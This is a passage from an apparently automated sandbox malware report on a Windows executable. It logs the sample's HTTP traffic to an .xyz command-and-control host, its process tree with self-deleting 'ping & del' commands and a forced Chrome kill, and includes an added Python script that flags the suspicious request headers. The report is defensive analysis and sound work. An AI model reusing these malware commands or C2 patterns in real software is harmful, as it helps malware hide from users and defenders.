22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                     Session ID:3
                                                                                                                                                     Source IP:192.168.2.6
                                                                                                                                                     Source Port:49734
                                                                                                                                                     Destination IP:104.21.23.16
                                                                                                                                                     Destination Port:80
                                                                                                                                                     Process:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                     Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                     Jan 29, 2021 17:37:04.743166924 CET | 254 kB | OUT | GET /info_old/ddd HTTP/1.1
                                                                                                                                                    Host: 84CFBA021A5A6662.xyz
                                                                                                                                                    Accept: */*
                                                                                                                                                     Jan 29, 2021 17:37:04.802903891 CET | 256 kB | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:37:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d1b86623561079a9b662c2aad2de952a91611938224; expires=Sun, 28-Feb-21 16:37:04 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a728b00001ea9ad122000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wH1AHcFc3kF96qmxaUBXlzDcY1TrtECZey%2Fv0bKfWmOYNqSDV7GGD9mBtDVKq6xIogzQHOnoCmodhKiY1BSgSe06IfFuNHZGnZqol7y6zlSw5Ire4A%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61946030d9121ea9-AMS
                                                                                                                                                     Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                    Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
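The three requests in this session are worth a closer look than the sandbox gives them. The User-Agent claims Chrome 86, yet the header set has no Accept-Encoding, carries a lowercase `upgrade-insecure-requests` name where a browser sends it title-cased, and pairs `Cache-Control: no-cache` with `Pragma: no-cache` and `Connection: Keep-Alive`, which is how a WinINet-style client looks rather than a browser (an inference from the headers, not something the report states). The third request drops the browser disguise entirely (two headers, uppercase Host), and every response is a Cloudflare "Suspected phishing site" interstitial, so the C2 domain was already flagged when this run was captured. The script below, added here as an example and not Joe Sandbox output or code from the sample, parses the three request heads transcribed from the capture and scores them with those indicators; the 16-hex-digit `.xyz` host pattern and the `/info_old/` path rule are generalisations from this one sample and are labelled as assumptions in the code.

```python
"""Header-level triage of the HTTP request heads captured above.

Added example for this report page, not sandbox output and not the
sample's code. Baseline for the "browser-like" checks is a stock Chrome 86
HTTP/1.1 request, which is what the User-Agent claims to be.
"""
import re
from dataclasses import dataclass

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36")
BROWSER_ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,"
                  "image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")

# Transcribed from the capture above (request heads only; bodies not shown in the report).
CAPTURED_REQUESTS = [
    "GET /info_old/r HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    f"Accept: {BROWSER_ACCEPT}\r\n"
    "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
    f"User-Agent: {CHROME_UA}\r\n"
    "upgrade-insecure-requests: 1\r\n"
    "Host: 84cfba021a5a6662.xyz\r\n\r\n",
    "POST /info_old/w HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Accept: {BROWSER_ACCEPT}\r\n"
    "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
    f"User-Agent: {CHROME_UA}\r\n"
    "upgrade-insecure-requests: 1\r\n"
    "Content-Length: 81\r\n"
    "Host: 84cfba021a5a6662.xyz\r\n\r\n",
    "GET /info_old/ddd HTTP/1.1\r\n"
    "Host: 84CFBA021A5A6662.xyz\r\nAccept: */*\r\n\r\n",
]

# Assumption: the family keeps a 16-hex-digit label under .xyz and the /info_old/ prefix.
HEX_LABEL_HOST = re.compile(r"^[0-9a-f]{16}\.xyz$")
C2_PATH = re.compile(r"^/info_old/\w+$")


@dataclass
class Request:
    method: str
    path: str
    headers: list  # (name, value) pairs in wire order, original case preserved

    def get(self, name):
        for n, v in self.headers:
            if n.lower() == name.lower():
                return v
        return None


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path and header pairs."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return Request(method, path, headers)


def triage(raw):
    """Return the indicator names that fire for one request head."""
    req = parse_request(raw)
    host = req.get("Host") or ""
    ua = req.get("User-Agent") or ""
    hits = []
    if HEX_LABEL_HOST.match(host.lower()):
        hits.append("hex_label_host")
    if host != host.lower():
        hits.append("uppercase_host")        # browsers lowercase the hostname before sending
    if C2_PATH.match(req.path):
        hits.append("info_old_path")
    if req.method == "POST" and C2_PATH.match(req.path):
        hits.append("post_to_c2_path")
    if "Chrome/" in ua and req.get("Accept-Encoding") is None:
        hits.append("chrome_ua_without_accept_encoding")   # Chrome always sends gzip, deflate
    if "Chrome/" in ua and any(n == n.lower() for n, _ in req.headers):
        hits.append("lowercase_header_name")  # Chrome title-cases header names over HTTP/1.1
    if (req.get("Cache-Control") == "no-cache" and req.get("Pragma") == "no-cache"
            and req.get("Connection") == "Keep-Alive"):
        hits.append("wininet_style_headers")  # trio typical of WinINet clients, not browsers
    if len(req.headers) <= 2:
        hits.append("minimal_header_set")
    return hits


def triage_all(raws):
    """Map each request path to its indicator list."""
    return {parse_request(r).path: triage(r) for r in raws}


if __name__ == "__main__":
    for path, hits in triage_all(CAPTURED_REQUESTS).items():
        print(f"{path:16} {', '.join(hits)}")
```

Run against live proxy logs, the same checks work as a cheap first pass for "browser UA with non-browser header shape"; the host and path rules are sample-specific and should be swapped for whatever the current infrastructure looks like.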


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior


                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:33
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                     • Rule: Ping_Command_in_EXE, Description: Detects a suspicious ping command execution in an executable, Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:38
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                     • Rule: Ping_Command_in_EXE, Description: Detects a suspicious ping command execution in an executable, Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 24%, Metadefender, Browse
                                                                                                                                                    • Detection: 59%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:40
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:43
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:46
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:103632 bytes
                                                                                                                                                    MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:48
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:74752 bytes
                                                                                                                                                    MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:49
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:59
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                    Imagebase:0x990000
                                                                                                                                                    File size:73160 bytes
                                                                                                                                                    MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                                                                                    • Detection: 2%, ReversingLabs

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

Start time: 17:37:05
Start date: 29/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 17:37:06
Start date: 29/01/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 3
Imagebase: 0x1120000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
